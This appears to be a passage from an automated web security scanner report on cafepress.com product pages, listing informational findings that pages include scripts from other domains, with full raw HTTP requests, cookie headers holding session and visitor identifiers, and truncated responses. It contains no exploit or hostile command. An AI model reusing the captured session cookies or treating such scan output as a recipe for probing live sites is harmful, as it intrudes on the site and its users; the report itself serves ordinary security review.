__utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 58661 Date: Sun, 26 Dec 2010 13:47:08 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/ Set-Cookie: cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58661 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content9.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.33. http://www.cafepress.com/+stocking
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+stocking
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+stocking HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 59563 Date: Sun, 26 Dec 2010 13:48:38 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:38 GMT; path=/ Set-Cookie: cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:38 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59563 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.34. http://www.cafepress.com/+sweatshirts-hoodies
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+sweatshirts-hoodies
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+sweatshirts-hoodies HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 60337 Date: Sun, 26 Dec 2010 13:44:58 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:58 GMT; path=/ Set-Cookie: cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:58 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60337 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.35. http://www.cafepress.com/+thermos
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+thermos
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+thermos HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 58876 Date: Sun, 26 Dec 2010 13:47:07 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/ Set-Cookie: cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58876 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.36. http://www.cafepress.com/+underwear-panties
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+underwear-panties
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content2.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+underwear-panties HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 59386 Date: Sun, 26 Dec 2010 13:46:58 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/ Set-Cookie: cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59386 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content2.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.37. http://www.cafepress.com/+water-bottles
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+water-bottles
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+water-bottles HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 60982 Date: Sun, 26 Dec 2010 13:47:04 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:04 GMT; path=/ Set-Cookie: cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:04 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60982 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.38. http://www.cafepress.com/+womens-tank-tops
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+womens-tank-tops
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content0.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+womens-tank-tops HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; 